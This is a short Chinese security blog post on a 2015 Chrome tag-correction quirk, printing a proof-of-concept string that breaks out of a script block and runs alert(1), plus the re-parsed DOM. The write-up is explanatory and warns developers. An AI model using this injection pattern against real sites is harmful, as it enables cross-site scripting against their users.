關(guān)于chrome的標(biāo)簽修正特性漏洞的再再深入
責(zé)編:admin |2015-02-09 17:56:28之前的那篇給出了chrome標(biāo)簽修正特性漏洞的兩個原型,是在老外發(fā)出的11的漏洞思路上的再延展。
我說這個是只屬于chrome xss filter的標(biāo)簽修正特性有點誤導(dǎo),這個是全局的,來看下面老外發(fā)的這個漏洞
http://code.google.com/p/chromium/issues/detail?id=68484
測試代碼是
1.<script><!–
2.var x = "pwned</script x><script x>alert(1);//";
3.//–></script>
結(jié)果被修正為
1.<html>
2.<head>
3.<script><!–
4.var x = "pwned</script>
5.<script x>alert(1);//";
6.//–></script>
7.<script></script>
8.</head>
9.<body></body>
10.</html>
chrome動態(tài)修正了這個HTML文檔的3處節(jié)點:
1. 修正為
2.閉合了
chrome的標(biāo)簽修正特性只是按標(biāo)簽配對來修正的,沒有考慮HTML注釋或其他復(fù)雜的情況,所以alert(1)執(zhí)行了!
深入分析就會發(fā)現(xiàn)chrome的標(biāo)簽修正特性漏洞影響深遠,在各種復(fù)雜的應(yīng)用環(huán)境中會產(chǎn)生漏洞。
黑客不僅可以用于非持久型的XSS漏洞,還能用于富文本環(huán)境中,也提醒各位程序員和安全工程師,你在服務(wù)端精心布置的安全防御策略,可能會被客戶端歪曲修正為安全漏洞。
- ISC.AI 2025正式啟動:AI與安全協(xié)同進化,開啟數(shù)智未來
- 360安全云聯(lián)運商座談會圓滿落幕 數(shù)十家企業(yè)獲“聯(lián)營聯(lián)運”認證!
- 280萬人健康數(shù)據(jù)被盜,兩家大型醫(yī)療集團賠償超4700萬元
- 推動數(shù)據(jù)要素安全流通的機制與技術(shù)
- RSAC 2025前瞻:Agentic AI將成為行業(yè)新風(fēng)向
- 因被黑致使個人信息泄露,企業(yè)賠償員工超5000萬元
- UTG-Q-017:“短平快”體系下的高級竊密組織
- 算力并網(wǎng)可信交易技術(shù)與應(yīng)用白皮書
- 美國美中委員會發(fā)布DeepSeek調(diào)查報告
- 2024年中國網(wǎng)絡(luò)與信息法治建設(shè)回顧